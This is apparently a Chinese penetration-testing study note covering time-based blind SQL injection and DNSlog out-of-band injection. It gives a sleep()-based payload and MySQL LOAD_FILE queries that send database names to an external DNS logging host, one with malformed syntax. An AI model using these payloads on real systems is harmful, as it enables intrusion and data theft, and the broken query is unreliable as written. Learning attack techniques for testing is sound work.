渗透测试 day4

时间盲注

原理:构造语句,通过页面响应的时长,来判断信息。

方法:构造逻辑语句,通过条件语句进行判断,为真则立即执行,否则延时执行

核心语法:

if(left(user(),1)='a',0,sleep(3));

 渗透测试 day4

 

 

 

Dnslog盲注

dnslog是用户访问网站过程中被dns服务记录的信息

原理: 通过布尔或时间盲注效率很低,需要发送很多的请求进行判断,很可能触发安全设备的防护,我们需要一种方式,减少请求,直接回显数据,这里就使用dnslog实现注入。

 

dnslog平台 :http://ceye.io/

mysql LOAD_FILE函数可以发起请求:

SELECT LOAD_FILE(CONCAT('\\\\','test','.mysql.d1egqb.ceye.io\\abc'));

方法:

构造语句,利用load_file()函数发起请求,使用dnslog接受请求,获取数据

核心语法:

SELECT LOAD_FILE(CONCAT('\\\\',select database()),'.mysql.d1egqb.ceye.io\\abc'));

 渗透测试 day4

 

 

load_file()函数只能在windows操作系统上使用,linux操作系统不能使用

 

 

上一篇:DAY4:SQL注入3


下一篇:Java 之路 Day4 Hello World